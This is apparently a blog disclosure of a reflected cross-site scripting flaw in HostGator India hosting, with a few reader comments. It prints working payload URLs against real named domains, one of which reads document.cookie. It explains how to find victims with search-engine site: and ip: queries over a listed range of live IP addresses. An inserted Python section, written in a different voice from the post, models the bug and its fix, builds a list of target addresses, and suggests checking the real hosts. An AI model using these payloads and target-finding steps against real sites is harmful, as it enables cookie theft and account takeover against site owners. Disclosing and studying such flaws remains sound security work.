Critical Cross-Site Scripting (XSS) Vulnerability in HostGator and IndiaGetOnline Making Millions of Its Customers' Sites Vulnerable
HostGator is a leading provider of web hosting, reseller hosting, VPS hosting, and dedicated servers. Over 8,000,000 websites trust HostGator for their web hosting. In India, HostGator won the No. 1 Best Web Hosting Award for 2013 for its free website-building resource with IndiaGetOnline. Since its establishment in 2002, HostGator has been a world-leading provider of web hosting services.
Today two Indian security researchers, "Manjot Gill" and "Rishal Dwivedi", sent me an XSS vulnerability in one of HostGator's subdomains:
--> http://www.cluster2.hostgator.co.in/%22%3E%3Cscript%3Ealert(%22HACKED%20BY%20ICH%20%22)%3C/script%3E
and they claim that many of the sites hosted there are vulnerable in the same way, for example:
http://ramneeksidhu.in/%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
It looked impressive at first glance, so I did a Google search for the hostgator.co.in site and was amazed by the results.
My research now points to a critical XSS vulnerability in HostGator affecting more than a million websites hosted with hostgator.co.in. (The proof-of-concept URLs below carry the payload in the request path and the server echoes it back in the response, so technically this is reflected XSS rather than stored/persistent XSS; the impact on every affected host is the same.)
So let's talk about what I found.
I first checked whether this link was vulnerable -->
No, it redirects to my.hostgator.in, so I proceeded to the next link -->
and yes, it is vulnerable. Next I did a Google search for
"site:.hostgator.co.in"
and that's it. Open any of the resulting links and append the payload, for example:
http://infragadget.hostgator.co.in/"><script>alert(document.cookie)</script>
This is the same kind of vulnerability I found 3 months ago in Adobe, which made thousands of Adobe Groups subdomains vulnerable.
So as of now there is an XSS vulnerability in HostGator that makes 64,000 HostGator subdomains plus every .in domain hosted on hostgator.co.in vulnerable.
Proof -->
Search for ip:119.18.48.78 (an IP address where some of the HostGator sites are hosted),
then open any of the resulting links and append "><script>alert(document.cookie)</script>
after the domain, for example -->
Some of the IP addresses of domains hosted on HostGator:
119.18.48.12 - 119.18.48.86
Search Bing for them with the ip: operator, changing the last octet (119.18.48.86, 119.18.48.65, 119.18.48.76, and so on); every address from 12 to 86 is vulnerable.
Effect of the vulnerability:
Each and every website hosted with hostgator.co.in and IndiaGetOnline is exposed to this vulnerability.
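As an added illustration (this is not code from the post, nor HostGator's own server code, which the page never shows), the following Python models the bug class behind the proof-of-concept URLs above: a "page not found" template that echoes the requested path into the HTML, the same template with per-context output encoding, and the offline check that tells the two apart. The template, the `victim.example` host and all function names are assumptions made for illustration.

```python
import html
import ipaddress
from urllib.parse import quote, unquote

# Payload from the write-up's proof-of-concept URLs.
PAYLOAD = '"><script>alert(document.cookie)</script>'


def render_not_found_vulnerable(path: str) -> str:
    """Hypothetical 'page not found' template that copies the requested
    path straight into an href attribute and into the page text.
    This is the bug class the post demonstrates: a path of
    /"><script>...</script> closes the attribute and the <a> tag, and
    the script that follows runs in the site's own origin."""
    return ('<html><body><p>The page '
            f'<a href="{path}">{path}</a> was not found.</p></body></html>')


def render_not_found_safe(path: str) -> str:
    """Same template with output encoding for each context: the path is
    percent-encoded before it goes into the URL attribute and
    HTML-escaped before it goes into text, so '"', '<' and '>' can no
    longer break out of their context."""
    href = html.escape(quote(path, safe="/"), quote=True)
    text = html.escape(path, quote=True)
    return ('<html><body><p>The page '
            f'<a href="{href}">{text}</a> was not found.</p></body></html>')


def payload_reflected(body: str, payload: str = PAYLOAD) -> bool:
    """Offline check behind the proof-of-concept: the page is only
    exploitable if the payload comes back byte-for-byte, not as
    &quot;&gt;&lt;script&gt;... or %22%3E%3Cscript%3E..."""
    return payload in body


def check_host(host: str, render, payload: str = PAYLOAD) -> dict:
    """Simulates 'open any link and append the payload after the domain'.
    The browser percent-encodes the payload in the URL (as in the
    cluster2.hostgator.co.in link above); the server decodes the path
    before handing it to the template. `render` stands in for the HTTP
    round trip so this runs without network access."""
    url = f"http://{host}/{quote(payload, safe='')}"
    encoded_path = url.split("/", 3)[3]
    body = render("/" + unquote(encoded_path))
    return {"url": url, "vulnerable": payload_reflected(body, payload)}


def candidate_ips(first: str, last: str) -> list:
    """Expands the post's '119.18.48.12 - 119.18.48.86' range into the
    addresses you would feed to the ip: search (or to check_host)."""
    start, end = ipaddress.ip_address(first), ipaddress.ip_address(last)
    return [str(start + i) for i in range(int(end) - int(start) + 1)]


if __name__ == "__main__":
    for name, render in (("vulnerable", render_not_found_vulnerable),
                         ("fixed", render_not_found_safe)):
        # 'victim.example' is a placeholder host, not a real HostGator site.
        print(name, check_host("victim.example", render))
    print(len(candidate_ips("119.18.48.12", "119.18.48.86")), "addresses")
```

The check looks for the payload verbatim because an encoded echo (`&lt;script&gt;` or `%3Cscript%3E`) is harmless; when testing the real hosts, replace `render` with an HTTP fetch of the printed URL and apply `payload_reflected` to the response body.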


Thanks for such news.

Awesome find, thanks for leaking it :P

Cool, buddy, very good.

I believe it is here in the US as well! If you have a site in the US, check for the directory "/notification" and/or "pending" along with modified .htaccess files and odd-named PHP files. Also look for new filenames starting with a "."

Contacted HostGator with full details days ago, still no response, and guessing they are working on this.